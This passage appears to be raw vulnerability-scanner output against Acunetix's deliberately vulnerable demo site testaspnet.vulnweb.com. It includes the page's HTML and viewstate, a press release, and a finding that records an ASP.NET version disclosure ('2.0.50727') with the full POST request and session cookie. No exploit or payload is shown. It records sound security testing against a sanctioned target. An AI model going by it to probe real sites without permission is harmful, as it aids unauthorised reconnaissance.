3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNBPxOo+suXOQO2cYqA7NT0P30nF" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Method	POST
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 464 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 Content-Length: 10945 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,945 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5